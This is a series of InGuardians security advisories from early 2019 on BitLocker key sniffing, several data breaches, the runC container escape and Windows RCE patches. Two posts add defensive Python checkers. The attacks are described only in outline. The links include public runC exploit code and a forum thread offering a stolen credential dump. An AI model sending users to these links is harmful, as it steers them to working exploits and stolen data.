3/26/19 Bitlocker Keys Recoverable, Allowing Bad Actors to Unlock Encrypted Disks

Issue
Earlier in March, researchers from Pulse Security released their analysis and research on recovering Bitlocker Full Disk Encryption (FDE) master keys from an associated v1.2 or v2.0 Trusted Platform Module (TPM) by sniffing the key exchange on the bus with inexpensive hardware.  The recovered master key was then used to decrypt the drive, recovering all of the data.

Impact

Given tools, time and knowledge of this technique, an attacker with physical access can decrypt a Bitlocker full disk-encrypted computer.

Many organizations rely on Microsoft Bitlocker as a solution for built-in, low cost, easily managed FDE, leveraging the previous investments in Microsoft products.  While InGuardians recommends FDE as a matter of course, these new attacks against default installations of Bitlocker have raised questions about its overall effectiveness.

While this attack is particularly involved in its implementation, requiring some special skills, hardware and analytic techniques, all are well within the capability of even a moderately determined attacker. This is compounded by readily available inexpensive hardware and open source tools.  Some points to note on this attack: the device must be in the attacker’s possession in order to capture the communication on the bus between the TPM and the drive; also, unlike “evil maid” attacks, this attack does require significant time and setup to perform.

Ultimately, should an organization lose a device encrypted with Bitlocker in the default configuration, it should no longer consider the data contained therein secure, and should consider the application of the appropriate breach notification requirements for its jurisdiction.

This specific attack is aimed at Bitlocker, but demonstrates that key exchange and key storage are critical elements of any security implementation. Every FDE system needs to be implemented properly. Like any technology involving cryptography, that implementation can be difficult.

Recommendations
In its default state, Bitlocker can be compromised through this attack. However, with the adoption of additional controls within the boot process and Bitlocker configuration, this attack can be effectively mitigated. These additional configurations can take the form of pairing the TPM with a pre-boot PIN to be entered by the user at boot time, or the TPM in combination with a properly configured smart card.  In both cases, two-factor authentication (2FA) has been added to the boot process, adding unknown/unrecoverable data to the Bitlocker encryption/decryption process. While this mitigates this specific attack, it does require user intervention at boot time, which may be perceived as a hindrance to workflow.

Additional Resources

Pulse Security – EXTRACTING BITLOCKER KEYS FROM A TPM https://pulsesecurity.co.nz/articles/TPM-sniffing

Microsoft – Bitlocker Countermeasures
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-countermeasures

InGuardians Events & Resources

Upcoming Webinars:

“HACKING AND HARDENING KUBERNETES” with Jay Beale, CTO at InGuardians

Thursday, March 28 at 12 PM PDT / 3 PM EDT
Understand how to attack and defend Kubernetes and other container orchestration platforms.
Register here: https://attendee.gotowebinar.com/register/3676332972988128524

——

“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security.

April 18, 12 PM PDT / 3 PM EDT
Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.

Register here: https://register.gotowebinar.com/register/8814422277734413068

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

——

Upcoming Classes

ICS410: ICS/SCADA SECURITY ESSENTIALS
Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019
——

SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019
——
SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019
——
SEC560: NETWORK PENETRATION TESTING AND ETHICAL HACKING (MENTOR SESSION)

Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit: https://www.inguardians.com/training/

3/13/19 Citrix Breached: Over Six Terabytes of Data Stolen, Impact to Clients Unknown

Issue
On March 8th, Citrix announced that it had been hacked and that over six (6) terabytes of sensitive data had been stolen. This attack is currently being attributed to the Iranian-backed Iridium group. The files were exfiltrated from the network after the malicious actors bypassed multi-factor authentication systems and connected to Citrix VPNs. The bad actors stole e-mail correspondence, files left on network shares, and data pertaining to project management and procurement. The FBI believes that the attackers gained access to Citrix networks by brute forcing a weak password on the external network, and it is not currently known how long the attackers were on the network before they were detected.

Impact
While the breach’s impact is currently being evaluated, Citrix clients should be monitored closely to ensure that client accounts and credentials were not stolen along with internal documents.

Recommendations
Given the sheer volume of data stolen in the breach, InGuardians recommends changing all passwords for accounts related to Citrix. InGuardians also recommends that organizations take a hard look at their password policies and ensure that strong passwords are used throughout the organization, so that password spraying of common passwords does not give attackers access to the network. Multi-factor authentication is also critical, but does not make strong password policies irrelevant.
If you suspect that your organization has been affected by the breach, begin incident response triage and initiate a threat hunting operation.

Additional Resources
Iranian-backed hackers ransacked Citrix, swiped 6TB+ of emails, docs, secrets, claims cyber-biz (The Register)
https://www.theregister.co.uk/2019/03/08/citrix_hacked_fbi/

“Citrix investigating unauthorized access to the internal network” (Citrix Blog: Stan Black)
https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/

“Iranian-backed hackers stole data from major U.S. government contractor” (NBC News)
https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986

InGuardians Events & Resources
LIVE WEBINAR Thursday, March 28 at 12 PM PDT / 3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Register here:  https://register.gotowebinar.com/register/3676332972988128524

Justin Searle, InGuardians Director of ICS Security will be at SANS ICS Summit in Orlando, Florida.

“Scanners, Tunnels, and Sims, Oh My!”
Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools with Justin Searle, our Director of ICS Security, at SANS ICS Summit | Mar 18-25 | Orlando, FL.

LIVE WEBINAR on April 18 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.
Register here: https://register.gotowebinar.com/register/8814422277734413068

For all upcoming training and events, please visit: https://www.inguardians.com/training/

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

3/7/19 Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked

Issue
Dow Jones’ watchlist of politicians, high-risk individuals and corporate entities has been exposed after a company with access to the database left it on a server without a password.
This watchlist includes senior political figures (“politically exposed persons”), their relatives, close associates and companies to which they are linked. It also includes individuals and organizations who have been involved in financial crimes and individuals on terrorist watchlists. It includes not only names, but also Dow Jones’ internal profile notes and PII including date of birth, place of citizenship and photographs. This watchlist, while leaked in file format here, is sold as a product accessible via APIs.

It is important to note that Dow Jones was not hacked in this instance.  A client of theirs, with legitimate access to the data, failed to secure its access to the information. That “weakest link” exposed a large database of sensitive information and negated the security efforts of Dow Jones and every other client paying for access who properly secured their access to the watchlist.

Impact
The overall impact of this breach is unknown at this time, but if this information is used to target high profile persons of interest it may lead to upstream liability for all companies involved. First off, this should trigger an examination of data sharing agreements at Dow Jones and subsequently serve as a lesson for the rest of us.  Next, we need to ask what other data on that server was compromised? What other servers of the Dow Jones client were compromised and what other information was lost? What is that company’s current security posture and in what ways has that been assessed or verified?

The next step is to immediately look at your own company’s data sharing or subscribing agreements. With what other organizations do you share data? What technical network, software, and procedural safeguards are in place? What contractual language is in place among business entities requiring information security practices? What assurances or auditing mechanisms are in place, both contractually AND in practice? When was the last time such systems were checked? WHO has the report? How is that report guarded?

Recommendations
First, answer the questions above, and more that will come to mind in your own organization. If you are not the ‘go to’ person for any of those questions, get the question to the right place.

We recommend that organizations explicitly review contracts and consider legal issues, in addition to requiring a third-party security assessment and vendor security questionnaire, before data sharing agreements go into effect.

Your business should have a data classification process – what matters most, some, and least? Know what data is sensitive, how sensitive it is, and where that data is stored and shared. Do those access points have logs? In recent engagements, InGuardians has continued to find organizations that are not prepared to detect or log unauthorized access to sensitive systems and data. Review what you log, where logs are stored, log retention policy, and how they are analyzed. A log that is overwritten in 48 hours is unlikely to provide useful info in the event of unauthorized access or to track a compromise and breach.

Additional Resources
Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked (TechCrunch)
https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/ 

Politically Exposed Person (Wikipedia)
https://en.wikipedia.org/wiki/Politically_exposed_person

Dow Jones Risk Screening Watchlist Exposed (Security Discovery blog)
https://securitydiscovery.com/dow-jones-risk-screening-watchlist-exposed-publicly/

Cloud Leak: WSJ Parent Company Dow Jones Exposed Customer Data (UpGuard Blog)
https://www.upguard.com/breaches/cloud-leak-dow-jones

A massive financial crime and terrorism database has leaked (ZDNet, 2016)
https://www.zdnet.com/article/world-check-financial-crime-and-terrorism-database-leaked/ 

InGuardians Events & Resources
LIVE WEBINAR Thursday, March 28 at 12 PM PDT / 3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Register here:  https://register.gotowebinar.com/register/3676332972988128524

Justin Searle, InGuardians Director of ICS Security will be at SANS ICS Summit in Orlando, Florida.
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools with Justin Searle, our Director of ICS Security, at SANS ICS Summit | Mar 18-25 | Orlando, FL.

LIVE WEBINAR on April 18 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.
Register here: https://register.gotowebinar.com/register/8814422277734413068

For all upcoming training and events, please visit: https://www.inguardians.com/training/

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

2/21/19 Container Escape in runC-based technology including Docker and Kubernetes

Issue
Security researchers have discovered a container escape method for many known runC-based containerization technologies, including Docker, Kubernetes, cri-o, and containerd.  Additionally, a slight variant of the exploit code is reported to work on LXC and Apache Mesos.  Amazon Web Services (AWS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Container Service for Kubernetes (Amazon EKS), and AWS Fargate, Google Kubernetes Engine (GKE), Digital Ocean, OpenShift, and other container providers were also affected and are in various states of patching.

In the case of this exploit, an attacker is able to escape from a container and gain full root access to the host. The attacker will then likely access other resources via network, storage and data stored on the host. Given this level of access, the attacker could rewrite any host-based firewall rules as necessary.

Multiple proof of concept (PoC) exploits exist for this vulnerability. One exploit relies on a malicious container deployed in the container infrastructure.  This malicious container can then be used to overwrite the host runC binary with minimal user interaction, ultimately granting root level access to the host operating system. While it may seem that the barrier to entry is the deployment of the malicious container, this is often easily overcome; many administrators fail to properly set permissions for users, allowing them to deploy their own containers at will, or, the administrators are often willing to use the “first available” public container that may already be poisoned by an attacker.

Another exploit can be used in an already-running container, likely by an attacker who compromises the container’s application or is able to start a fresh privileged container on the cluster. It appears that this requires that an administrator or infrastructure component “exec” a command in that container after the exploit has run. In any case, this vulnerability will be exploited.

Impact
Failure to resolve runC vulnerabilities can allow a malicious party to gain root level access to the underlying container host. This root level access grants full permissions to the host operating system, as well as the ability to interact with all of the containers running on the host. To compound the issue, once an attacker has root access to the one host, it can be used as a pivot point into the internal network, with the capability to compromise additional resources.

Recommendations
InGuardians’ recommendations have several components, depending on the platform that has been adopted:
•    All platforms
◦    Examine runC-created container logs for anomalous activity.
◦    Compare the running list of containers to your inventory.
•    Internal cluster
◦    Update runC to the latest version for your supported platform.  See the Additional Resources section for details.
•    Hosted provider
◦    Amazon:  Amazon has currently provided patches for Amazon Linux, ECS, EKS, and Fargate, many of which need administrator intervention to apply. See the Additional Resources section for details. [4]
◦    Google: Default GKE nodes running Container-Optimized OS have been patched, but Ubuntu nodes must be patched by the user. See the Additional Resources section for details. [3]
◦    Digital Ocean: In an email to Digital Ocean customers, they have informed subscribers that they have patched runC.
◦    OpenShift and others: Contact your provider or review their vulnerability tracking information for the status of patches.
•    Other projects (Apache Mesos, LXC, etc.)
◦    Contact the project for the status of patches, as no public information has been posted at the time of this writing.
•    Overall recommendations
◦    Develop or amend a robust patching strategy to specifically address containerization infrastructure.
◦    Implement the Principle of Least Privilege for your container service of choice, preventing deployment of new containers except by select users that have a business need to do so.
◦    Deploy additional configuration, depending on platform, preventing runC from being executed as root (UID 0) by using a lower-privilege user. [2]
◦    Develop and deploy a robust AppArmor or SELinux profile to detect and prevent runC overwrites.
◦    Use Pod Security Policies to enforce best practices, including requirements for unprivileged containers and AppArmor/SELinux/Seccomp profiles.
◦    Upon deployment of new containers, provide a vetting mechanism for the selected public containers to ensure they do not contain additional, unwanted exploit code.  Alternatively, do not rely on public container images; create them in house with known good code and applications.
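As an added example, not InGuardians’ code or part of Kubernetes itself, the following Python check applies several of the points above to a pod manifest before it is deployed: it flags privileged containers, containers that may run as root, missing AppArmor/seccomp annotations, and images from outside an in-house registry. The registry name `registry.example.internal` and the two sample manifests are constructed for the example.

```python
"""Pre-deployment check of a Kubernetes pod manifest against the hardening
points above: no privileged containers, no root user, AppArmor and seccomp
profiles attached, images only from an in-house registry.

Added example; not InGuardians' or the Kubernetes project's code.  The
registry name and the sample manifests are constructed for this example."""

from typing import Dict, List

# Assumption: the organisation's vetted in-house registry (constructed name).
APPROVED_REGISTRY = "registry.example.internal/"

# Annotation keys used to attach AppArmor and seccomp profiles in the
# Kubernetes releases current at the time of CVE-2019-5736.
APPARMOR_PREFIX = "container.apparmor.security.beta.kubernetes.io/"
SECCOMP_KEY = "seccomp.security.alpha.kubernetes.io/pod"


def check_pod(manifest: Dict) -> List[str]:
    """Return a list of findings; an empty list means the pod passes."""
    findings: List[str] = []
    annotations = manifest.get("metadata", {}).get("annotations", {}) or {}
    spec = manifest.get("spec", {})
    pod_sc = spec.get("securityContext", {}) or {}

    if SECCOMP_KEY not in annotations:
        findings.append("pod: no seccomp profile annotation")

    for container in spec.get("containers", []):
        name = container.get("name", "<unnamed>")
        sc = container.get("securityContext", {}) or {}

        if sc.get("privileged", False):
            findings.append(f"{name}: privileged container")

        # runAsUser / runAsNonRoot may be set at pod or container level;
        # the container-level value overrides the pod-level one.
        run_as_user = sc.get("runAsUser", pod_sc.get("runAsUser"))
        non_root = sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot"))
        if run_as_user == 0 or (run_as_user is None and not non_root):
            findings.append(f"{name}: may run as root (UID 0)")

        if APPARMOR_PREFIX + name not in annotations:
            findings.append(f"{name}: no AppArmor profile annotation")

        image = container.get("image", "")
        if not image.startswith(APPROVED_REGISTRY):
            findings.append(f"{name}: image {image!r} not from approved registry")

    return findings


# Constructed sample manifests: one that fails every check, one that passes.
BAD_POD = {
    "metadata": {"name": "demo-bad", "annotations": {}},
    "spec": {
        "containers": [
            {"name": "app", "image": "nginx:latest",
             "securityContext": {"privileged": True}},
        ]
    },
}

GOOD_POD = {
    "metadata": {
        "name": "demo-good",
        "annotations": {
            SECCOMP_KEY: "runtime/default",
            APPARMOR_PREFIX + "app": "runtime/default",
        },
    },
    "spec": {
        "securityContext": {"runAsNonRoot": True, "runAsUser": 1000},
        "containers": [
            {"name": "app", "image": APPROVED_REGISTRY + "app:1.4.2"},
        ],
    },
}

if __name__ == "__main__":
    for label, pod in (("bad", BAD_POD), ("good", GOOD_POD)):
        print(label, check_pod(pod) or "OK")
```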

Additional Resources
[1] CVE-2019-5736: runc container breakout (all versions)
https://seclists.org/oss-sec/2019/q1/119

[2] Kubernetes Blog: Runc and CVE-2019-5736
https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/

[3] Google Cloud runC Security Bulletin
https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc

[4] AWS runC Security Bulletin
https://aws.amazon.com/security/security-bulletins/AWS-2019-002/

[5] ZDNet: Doomsday Docker security hole uncovered
https://www.zdnet.com/article/doomsday-docker-security-hole-uncovered/

[6] Nick Frichette’s Proof of Concept Exploit for CVE-2019-5736
https://github.com/Frichetten/CVE-2019-5736-PoC

[7] Exploit-DB Exploit 46369 for CVE-2019-5736
https://www.exploit-db.com/exploits/46369

InGuardians Events & Resources
LIVE WEBINAR Thursday Feb 21 12 PM PST | 3 PM EST

Our Senior Security Consultant Adam Crompton @3nc0d3r is dropping a new set of tools for #RedTeam operations. Demo-heavy webinar… you don’t want to miss!

Register here: https://attendee.gotowebinar.com/register/8395114722323637259

For all of our upcoming webinars, please visit: https://www.inguardians.com/webinars/

Adam will join our CTO Jay Beale on the RSA stage for “Hacking and Hardening Kubernetes”. This talk will demonstrate attacks on Kubernetes clusters, then demonstrate the defenses that defeat those attacks.

More about this talk: https://www.inguardians.com/events/

1/31/19 Managing security, risk, and insecurity

Issue
There have been several massive database breaches, application vulnerabilities, and many new exploits, and it’s only a month into the new year. Some of them are technical exploits and some have been procedural, like storing aggregate identity or authentication information.

Impact
System security is not the primary job for most organizations, but an aspect of providing some other goods or services. The core or primary business functions need to be supported by your data systems – they need to work. They should also be efficiently controlled and, of course, that’s why there are applications & programs in place to enable effective management. However, no one can know the inner workings of all of your applications. What can a manager do to reduce risk and exposure? Here is a short list to help manage insecurity.

Recommendations

  • Inventory all of the operating systems and applications on the network.
    • If there are separate segments or networks, know which apps are where, especially on any external or internet-facing networks.
    • Include which version or build numbers are installed, along with the latest patch number.
    • IT/Security should provide regular updates and know when new exploits impact installed apps.
  • Review and enforce identity/credential management policies.
    • Require multi-factor authentication.
    • Require aperiodic changes – not all at once, and not always on the first of the month.
    • Use password management software.
  • Test the vulnerability and patch management process.
    • Know what public vulnerabilities and patches exist for each of your OSs & apps.
    • Know what the patch testing and deployment processes are.
    • Know how to determine which patches are critical.
  • Inventory and classify data.
    • Identify sensitive and compartmentalized information.
    • Require specific handling procedures for each level of information classification.
    • Clearly label data with its information classification.
    • Securely store and compartmentalize sensitive and/or confidential information.
  • Conduct system logging and log analysis.
    • Log critical and important events on sensitive systems and networks.
    • Sign and store logs for analysis and retention.
    • Histogram outgoing traffic – categorize known destinations, flag outliers.
    • Conduct log review and analysis of critical and important systems in order to identify areas of improvement in performance, availability, and security.
  • Maintain and analyze network and application controls.
    • Tune firewalls/IPS/IDS to deter and detect exfiltration.
    • Apply targeted rule sets tailored to the security level of each network segment.
    • Analyze the security logs looking for performance hits and operational, business, and security-related events.


Remember, because we do not and cannot know what the next exploit is in advance, we are really managing levels of insecurity. As I was writing this, two new issues popped up: Apple’s FaceTime can eavesdrop before you actually connect, and Google is apparently systematically broadcasting sensitive browsing and personal information to third party advertisers. One could be listening in on a board meeting, the other could be revealing someone’s searches for particular grades of aluminum or certain electronic chips. Both could be sources of business intelligence.

A senior manager should be able to ask to see the results of a log review and not have to wait for it to happen – someone should have one for that week or day and be able to give a SHORT precis.  Simply asking the question, and then watching averted eyes and feet shuffling, may tell you all you need to know.

Take that response and shape behaviors, not by barking, but by clearly laying out what’s needed to keep up with events.

Additional Resources

“Apple to fix FaceTime bug that allows eavesdropping” – Washington Post

https://www.washingtonpost.com/business/technology/apple-turns-off-group-facetime-amid-reports-of-bug/2019/01/29/9d5f73a2-23bb-11e9-b5b4-1d18dfb7b084_story.html

Google and IAB ad category lists show ‘massive leakage of highly intimate data,’ GDPR complaint claims

https://techcrunch.com/2019/01/27/google-and-iab-ad-category-lists-show-massive-leakage-of-highly-intimate-data-gdpr-complaint-claims/

Data management giant Rubrik leaked a massive database of client data
https://techcrunch.com/2019/01/29/rubrik-data-leak/

InGuardians Events & Resources

Our next webinar “All of Your Copy/Paste Belongs to US” goes live in February. Stay tuned for dates and registration links by visiting https://www.inguardians.com/webinars/ or following @InGuardians on Twitter.

Black Hat USA 2019 registration is open!

Jay Beale, our CTO is teaching “PURPLE TEAM VIEW: ATTACKING AND DEFENDING LINUX, DOCKER, AND KUBERNETES”
Register here:

https://www.blackhat.com/us-19/training/schedule/#a-purple-team-view—attacking-and-defending-linux-docker-and-kubernetes-14309

Justin Searle, our Director of ICS Security is teaching “ASSESSING AND EXPLOITING CONTROL SYSTEMS & IIOT”

Register here:

https://www.blackhat.com/us-19/training/schedule/#assessing-and-exploiting-control-systems–iiot-14015

1/23/19 Over 1TB of Stolen Account Usernames and Passwords Made Available Publicly Last Week

Issue
A collection of over one terabyte of user data with names and passwords has been released. The passwords are allegedly from more than 2,000 compromised sites, though some or many of the site compromises may have occurred more than a year ago. As such, the collected passwords may not be current for the sites from which they were stolen. Given many people’s re-use of passwords, however, those passwords may be useful on entirely different sites.

Said to be a portion of a larger collection, this collection (also referred to as a “data dump”) has been referred to as “Collection #1”. “Collection #1” comprises over 2.7 billion records and 773 million unique email addresses. Unfortunately, this represents only a small portion of the full collection currently being distributed on many dark web and hacking forums. The full collection, which is made up of “Collection #1-5 and Latest Anti-Public & Zabagur #1,” is a cloud-stored repository that contains over 1TB of data and is being sold on hacker forums.

The real problem and question is, “where did this dump come from, and which companies were affected and are unaware?” Troy Hunt, the primary security researcher behind the HaveIBeenPwned and Pwned Passwords checking sites, released a post documenting his analysis and ingestion of the email addresses and passwords he obtained from “Collection #1.” Mr. Hunt’s plan for notifying users relies on his own service and on vendors such as 1Password, whose Watchtower feature has integrated compromised-site checking, to check against the lists at HaveIBeenPwned.com and alert users of compromised accounts and credentials.

Mr. Hunt stated that this ingestion represented 140 million new email addresses that haveibeenpwned had not yet seen and therefore were not part of other publicly-released data breaches. These credentials are typically used by attackers to obtain access to services or applications. Attackers use the credentials from this type of data breach, testing them against many different websites, gaining access on a portion of those sites. This type of attack is commonly called “credential stuffing”, and presents a risk that many users do not often consider.

Impact
If your users are still using any of the passwords contained in this collection, attackers may use those same passwords, gaining access to both company and personal resources, such as e-mail, banking, document storage, and remote access.  The greatest impact stems from the difficulty that people have in managing large numbers of unique passwords. Many will use the same or similar passwords on multiple sites/services. Attackers will use variations of these passwords, including, but not limited to, incrementing numbers, years, or mixing in character/digit replacements.

Recommendations

  • Ensure all employees use multi-factor authentication for all company resources.
  • Check whether both company and personal email addresses appear in the public breach information, including but not limited to HaveIBeenPwned.com.
  • Use a mass password changing service to generate unique passwords and change all your current passwords to newer, stronger and differing passwords.
  • Never use the same password on multiple sites.
  • Never use common or easily guessable patterns for passwords (season-year, incrementing, etc.).
  • Enable two-factor authentication, such as TOTP or third-party services like those available from Duo, for all services that support it and contain any sensitive or personal information.
  • Sign up for monitoring services that watch for this type of information, or use a tool such as Watchtower integrated into 1Password’s password manager to watch for compromised accounts.
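As an added example, not InGuardians’ or Troy Hunt’s code, here is how a password can be checked against the Pwned Passwords service mentioned above without sending the password itself (the k-anonymity range lookup: only the first five hex characters of its SHA-1 hash are sent and the match is made locally), together with a simple check for the season-year pattern the list warns against. The sample range response is constructed so the code runs offline; `fetch_range` performs the live query against `api.pwnedpasswords.com` when wanted.

```python
"""k-anonymity check against Pwned Passwords plus a season-year pattern test.

Added example; not InGuardians' or Troy Hunt's code.  The range API format
(one `HASH_SUFFIX:COUNT` line per match) is the service's published format;
the sample response below is constructed so the example runs offline."""

import hashlib
import re
import urllib.request
from typing import Callable, Tuple

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Split the upper-case SHA-1 hex digest into the 5-char prefix that is
    sent to the service and the 35-char suffix that is matched locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix: str) -> str:
    """Live query: fetch every suffix the service knows for this prefix."""
    req = urllib.request.Request(
        RANGE_URL + prefix, headers={"User-Agent": "pwned-range-example"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, fetch: Callable[[str], str] = fetch_range) -> int:
    """Return how often the password appears in Pwned Passwords (0 = unseen).

    The full hash never leaves this function: `fetch` receives only the prefix,
    and the suffix comparison happens on the caller's machine."""
    prefix, suffix = sha1_prefix_suffix(password)
    for line in fetch(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count)
    return 0


# Season-year passwords such as "Winter2019!" are the first thing an attacker
# tries when spraying variations of a leaked password.
SEASON_YEAR = re.compile(
    r"^(spring|summer|autumn|fall|winter)[-_ ]?(19|20)\d{2}[^a-z0-9]*$",
    re.IGNORECASE,
)


def looks_like_season_year(password: str) -> bool:
    """True if the password is a season followed by a four-digit year."""
    return SEASON_YEAR.match(password) is not None


# Constructed sample of a range response for prefix 5BAA6 (the prefix of
# SHA-1("password")).  The second line is the real suffix of that hash; the
# other suffixes and all counts are made up for the example.
SAMPLE_RANGE = (
    "1D72CD07550416C216D8AD296BF5C0AE8E0:10\n"
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471\n"
    "1E2AAA439972480CEC7F16C795BBB429372:1\n"
)


def offline_fetch(prefix: str) -> str:
    """Stand-in for fetch_range that serves the constructed sample."""
    return SAMPLE_RANGE if prefix == "5BAA6" else ""


if __name__ == "__main__":
    for pw in ("password", "Winter2019!", "correct horse battery staple"):
        print(pw, breach_count(pw, offline_fetch), looks_like_season_year(pw))
```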

Additional Resources
“The 773 Million Record “Collection #1” Data Breach” (Troy Hunt’s blog)
https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/

Collection 1 through 5, Anti-Public, Zabagur #1 (Raidforums post)
https://raidforums.com/Thread-Collection-1-5-Zabagur-AntiPublic-Latest-120GB-1TB-TOTAL-Leaked-Download

“HaveIBeenPwned” Compromised Account Search Service
https://haveibeenpwned.com/

“Pwned Passwords” Compromised Password Search Service
https://haveibeenpwned.com/Passwords

“Credential Stuffing” (Wikipedia)
https://en.wikipedia.org/wiki/Credential_stuffing

“Credential Stuffing” (OWASP)
https://www.owasp.org/index.php/Credential_stuffing

InGuardians Events & Resources

Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum.  You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.

https://attendee.gotowebinar.com/register/2756488141619406860

For future webinars, please visit:

https://www.inguardians.com/webinars/

InGuardians friends in Florida! David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session of the SEC560 “Network Penetration Testing and Ethical Hacking” class:

Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.

  • Over 30 hands-on labs
  • Comprehensive coverage of tools
  • Real world tips from the experts
  • CTF Challenge 

SEC560 is a must for every security professional!

Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

Dive deep into SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques with hands-on training from Justin Searle, our Director of ICS Security, at SANS Secure Japan, Mon, February 25 – Sat, March 2, 2019.

https://www.sans.org/event/secure-japan-2019/course/advanced-web-app-penetration-testing-ethical-hacking

For more events and future training schedule, please visit https://www.inguardians.com/training/

1/14/19 Microsoft patches multiple remote code execution vulnerabilities

Issue
On January 8th, 2019 Microsoft released its monthly Windows update, which includes fixes for multiple Remote Code Execution (RCE) vulnerabilities. One affects the Windows DHCP client: an attacker who can send a specially crafted DHCP response to a vulnerable client can execute arbitrary code in the SYSTEM context. The Jet Database Engine also has multiple RCE issues; it handles memory improperly in a way that permits execution of arbitrary code when a user opens a specially crafted file. There are also a couple of RCE issues in Hyper-V which allow a malicious application running on a guest OS to execute code on the host OS. Finally, there is an RCE vulnerability in Exchange which, when triggered by a specially crafted email, permits arbitrary code execution in the SYSTEM context, with no user interaction required.

Impact
With multiple instances of Remote Code Execution in the first patch of 2019 but no publicly available proof of concept at this time, InGuardians currently rates the impact as Medium. While exploits are not public yet, it remains unknown whether malicious actors already have them and are using them. Should exploits become public, the impact could rapidly move into the Critical range, particularly given the size of Microsoft Exchange’s enterprise user base.

Recommendations
Given the severity of these issues, InGuardians recommends that you evaluate and push these patches to production environments posthaste. Prioritize Exchange servers, where the trigger is simply a crafted email, and Hyper-V hosts that run untrusted guests. In addition, apply any relevant IPS and IDS signatures and monitor for hits.

Additional Resources
“CVE-2019-0579 Details” (Mitre)
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0579

“CVE-2019-0547 Details” (Mitre)
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0547

“CVE-2019-0550 Details” (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0550

“CVE-2019-0551 Details” (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0551

“CVE-2019-0586 Details” (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0586

InGuardians Events & Resources
Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll see a few interesting software packages (with demos) to begin your exploration of the RF spectrum, and we’ll discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.
https://attendee.gotowebinar.com/register/2756488141619406860

For future webinars, please visit:
https://www.inguardians.com/webinars/

InGuardians friends in Florida! David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session of the SEC560 “Network Penetration Testing and Ethical Hacking” class:
Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.
  • Over 30 hands-on labs
  • Comprehensive coverage of tools
  • Real-world tips from the experts
  • CTF Challenge

SEC560 is a must for every security professional!

Reserve your spot now!
https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

For more events and future training schedule, please visit https://www.inguardians.com/training/

1/2/19 Failures in Delivery: CenturyLink, Tribune Publishing and the L.A. Times’ End of Year Problems

Issue
Two different events at the end of December 2018 revealed previously unrecognized gaps in business continuity planning. CenturyLink, a major telecom provider that also manages critical 911 systems, experienced a nationwide outage. Beyond the heavy impact on emergency services, the disruption to its core business caused many customers to cancel or reschedule calls, or to conduct business and personal calls over out-of-band solutions such as Signal and Slack.

